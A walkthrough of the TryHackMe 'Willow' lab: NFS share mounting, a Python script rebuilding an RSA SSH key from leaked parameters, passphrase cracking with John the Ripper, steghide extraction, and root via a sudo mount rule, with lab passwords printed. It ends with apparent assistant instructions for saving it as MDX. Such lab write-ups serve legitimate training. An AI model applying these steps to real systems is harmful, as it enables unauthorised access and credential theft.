Machine Overview
| Platform | TryHackMe |
| Difficulty | Medium |
| OS | Linux |
| Tags | NFS | RSA-Cryptography | Steganography | Privilege Escalation |
Initial Enumeration
Port Scanning
Starting with an Nmap scan to identify open services:
nmap -sVC 10.80.134.237
The scan reveals several interesting services:
- Port 22: OpenSSH 6.7p1
- Port 80: Apache httpd 2.4.10
- Port 111/2049: NFS (Network File System)
Web Enumeration
Visiting the web server on port 80 reveals a page with seemingly random numbers:
This is decimal-encoded ASCII text. Using DCode.fr to analyze the cipher:
The decoded message reveals: "Hey Willow, here's your SSH Private key -- you know where the decryption key is!"
This hints that we'll need to find a decryption key or reconstruct the SSH key from other sources.
NFS Enumeration
Since NFS is exposed, check for available shares:
showmount -e 10.80.134.237
The server exports /var/failsafe to everyone. Let's mount it:
sudo mkdir -p /mnt/nfs/failsafe
sudo mount -t nfs 10.80.134.237:/var/failsafe /mnt/nfs/failsafe
sudo ls /mnt/nfs/failsafe
The share contains a file named rsa_keys. Examining its contents:
cat /mnt/nfs/failsafe/rsa_keys
The file contains RSA parameters:
- Public Key: (23, 37627) → (e, n)
- Private Key Pair: (61527, 37627) → (d, n)
Initial Access
RSA Key Reconstruction with Python
Given the RSA parameters (n=37627, e=23, d=61527), we need to reconstruct the private key. Using a Python script to factor n and generate the PEM key:
#!/usr/bin/env python3
from Crypto.PublicKey import RSA
import math
n = 37627
e = 23
d = 61527
# Factor n to get p and q
def factor(n):
for i in range(2, int(math.sqrt(n)) + 1):
if n % i == 0:
return i, n // i
return None
p, q = factor(n)
print(f"p: {p}, q: {q}")
# Calculate additional parameters
phi = (p-1) * (q-1)
print(f"Verified d: {d == pow(e, -1, phi)}")
# Construct RSA key
key = RSA.construct((n, e, d, p, q))
private_key = key.export_key()
print(private_key.decode())Running this script outputs the RSA private key:
-----BEGIN RSA PRIVATE KEY-----
MIICOQIBAAJBAL...
-----END RSA PRIVATE KEY-----
Save this output to id_rsa.
SSH Key Cracking
The private key is password-protected. First, convert it to John format:
ssh2john id_rsa > hash.txt
Now crack it with John the Ripper using rockyou.txt:
john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
Cracked Password: wildflower
Remove the passphrase from the key for easier use (or use it directly):
chmod 600 id_rsa
ssh-keygen -p -f id_rsa
# Enter old passphrase: wildflower
# Enter new passphrase: (empty)
Now SSH into the box as user willow:
ssh -i id_rsa willow@10.80.134.237
Upon successful connection with the correct passphrase, we're greeted with a poetic message from "The Willow Tree" English Folksong.
User Flag
Steganography Extraction
In willow's home directory, there's an image file user.jpg:
Download it to your local machine:
scp -i id_rsa willow@10.80.134.237:/home/willow/user.jpg .
The passphrase for steghide is the same as the SSH key: wildflower
Extract hidden data from the image:
steghide extract -sf user.jpg
This extracts root.txt containing the user flag (the real root flag taunt).
Privilege Escalation
Sudo Analysis
Checking sudo privileges:
sudo -l
User willow may run the following commands on willow-tree:
(ALL : ALL) NOPASSWD: /bin/mount /dev/*
This allows mounting any block device as root without password.
Finding Hidden Devices
Investigating /dev/ reveals a suspicious device:
ls /dev/
Notice the hidden_backup device. Checking disk labels:
ls -la /dev/disk/by-label/
The hidden_directory symlink points to ../../xvda5. Checking UUIDs:
ls -la /dev/disk/by-uuid/
Mounting the Hidden Filesystem
Create a mount point and mount the hidden device as root using the sudo privilege:
sudo -u root mount /dev/hidden_backup /tmp/pwn
ls /tmp/pwn
cat /tmp/pwn/creds.txt
The creds.txt file contains credentials:
- root:
7QvbvBTvwPspUK - willow:
U0ZZJLGYhNAT2s
Getting Root
Switch to the root user using the discovered password:
su root
# Password: 7QvbvBTvwPspUK
whoami
cd /root
ls
cat root.txt
The /root/root.txt contains a fake flag with the message:
"This would be too easy, don't you think? I actually gave you the root flag some time ago. You've got my password now -- go find your flag!"
The real root flag was obtained earlier via steghide extraction from user.jpg (saved as root.txt in your working directory).
Key Takeaways
- NFS Security: Anonymous NFS shares can leak cryptographic material or credentials
- RSA Reconstruction: Given n, e, and d, RSA keys can be reconstructed programmatically using Python (PyCryptodome) without needing external GitHub tools
- Steganography: The
steghidetool hides data in images; always check with passwords found during enumeration - Sudo Mount Privileges:
NOPASSWD: /bin/mount /dev/*allows attackers to mount raw disk partitions containing sensitive files like/etc/shadowbackups or credential stores
Tools Used
- Nmap
- showmount / mount.nfs
- Python (PyCryptodome/Crypto.PublicKey) for RSA reconstruction
- John the Ripper (ssh2john)
- steghide
- Standard Linux enumeration utilities
To use this file:
- Copy the code block above
- Create a new file named
willow.mdxin your project (e.g.,app/writeups/willow.mdxorcontent/writeups/willow.mdxdepending on your structure) - Paste the content
- Make sure the image paths (
/images/writeups/willow/...) match your public directory structure (you may need to rename your uploaded PNG files to match these paths)
The file uses your custom MDX components (Cover, Step, Note, Warning) which will render with the styling from your mdx-components.tsx and MdxWidgets.tsx files.